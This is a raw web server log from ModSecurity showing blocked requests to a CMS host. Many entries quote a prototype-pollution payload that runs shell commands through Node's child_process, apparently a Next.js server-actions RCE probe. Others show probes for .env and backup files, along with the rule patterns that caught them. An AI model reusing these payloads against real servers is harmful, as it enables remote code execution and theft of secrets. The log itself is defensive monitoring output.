\\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aascr2XxhiP1i0j6zrlr5gAAAEU"] [Fri Mar 06 20:27:59.677841 2026] [:error] [pid 8673:tid 8745] [client 54.213.107.147:41658] [client 54.213.107.147] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aascr2XxhiP1i0j6zrlr5wAAAFU"] [Fri Mar 06 21:09:20.370422 2026] [:error] [pid 15451:tid 15472] [client 35.78.124.56:35598] [client 35.78.124.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aasmYDHc-vQPL0suTUOfLAAAAVI"] [Fri Mar 06 21:09:20.592115 2026] [:error] [pid 15451:tid 15459] [client 35.78.124.56:35598] [client 35.78.124.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aasmYDHc-vQPL0suTUOfLQAAAUU"] [Fri Mar 06 21:09:20.821056 2026] [:error] [pid 15451:tid 15471] [client 35.78.124.56:35598] [client 35.78.124.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aasmYDHc-vQPL0suTUOfLgAAAVE"] [Fri Mar 06 21:29:14.399555 2026] [:error] [pid 14438:tid 14654] [client 85.11.167.19:35904] [client 85.11.167.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1772825372_5891',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1772825372_589..."] [ve [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aasrCgeN8XtnchGP78oD0AAAARI"], referer: https://cms-1.dev-unit.com [Fri Mar 06 21:29:14.475334 2026] [:error] [pid 14438:tid 14640] [client 85.11.167.19:35914] [client 85.11.167.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1772825372',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1772825372',{'timeo..."] [ve [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aasrCgeN8XtnchGP78oD0QAAAQQ"], referer: https://cms-1.dev-unit.com [Fri Mar 06 21:45:10.829150 2026] [:error] [pid 14438:tid 14651] [client 100.23.127.62:42276] [client 100.23.127.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aasuxgeN8XtnchGP78oMSAAAAQ8"] [Fri Mar 06 21:45:10.992427 2026] [:error] [pid 14438:tid 14649] [client 100.23.127.62:42276] [client 100.23.127.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aasuxgeN8XtnchGP78oMSQAAAQ0"] [Fri Mar 06 21:45:11.162621 2026] [:error] [pid 14438:tid 14650] [client 100.23.127.62:42276] [client 100.23.127.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aasuxweN8XtnchGP78oMSwAAAQ4"] [Sat Mar 07 18:14:01.380039 2026] [:error] [pid 15190:tid 15290] [client 185.177.72.30:40084] [client 185.177.72.30] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/env.bak"] [unique_id "aaxOyXeWHFvsckDL6jx64QAAAYw"] [Sat Mar 07 21:54:38.511941 2026] [:error] [pid 15179:tid 15289] [client 56.125.145.120:59936] [client 56.125.145.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aayCfvYlssblAr8C5aLV5QAAAQw"] [Sat Mar 07 21:54:38.718865 2026] [:error] [pid 15179:tid 15298] [client 56.125.145.120:59936] [client 56.125.145.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aayCfvYlssblAr8C5aLV5gAAAQ8"] [Sat Mar 07 21:54:38.934543 2026] [:error] [pid 15179:tid 15279] [client 56.125.145.120:59936] [client 56.125.145.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aayCfvYlssblAr8C5aLV6AAAAQk"] [Sat Mar 07 22:25:44.626950 2026] [:error] [pid 20229:tid 20253] [client 3.101.121.162:55884] [client 3.101.121.162] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aayJyNlOTbUPx3fOZZJYbAAAANY"] [Sat Mar 07 22:25:44.789378 2026] [:error] [pid 20229:tid 20239] [client 3.101.121.162:55884] [client 3.101.121.162] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aayJyNlOTbUPx3fOZZJYbQAAAMg"] [Sat Mar 07 22:25:44.958676 2026] [:error] [pid 20229:tid 20236] [client 3.101.121.162:55884] [client 3.101.121.162] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aayJyNlOTbUPx3fOZZJYbgAAAMU"] [Sun Mar 08 07:55:40.076110 2026] [:error] [pid 11078:tid 11132] [client 185.177.72.60:20948] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/env.backup"] [unique_id "aa0PXH-dmvIeGeY060ndfwAAAdY"] [Sun Mar 08 07:55:41.271321 2026] [:error] [pid 13472:tid 13521] [client 185.177.72.60:19834] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/env.backup"] [unique_id "aa0PXV3UyizU6P-l0YK3PgAAAE4"] [Sun Mar 08 07:55:44.180512 2026] [access_compat:error] [pid 13472:tid 13509] [client 185.177.72.60:20332] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Sun Mar 08 07:55:46.692537 2026] [access_compat:error] [pid 7010:tid 7040] [client 185.177.72.60:53658] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Sun Mar 08 07:55:59.760602 2026] [:error] [pid 13472:tid 13525] [client 185.177.72.60:53574] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag 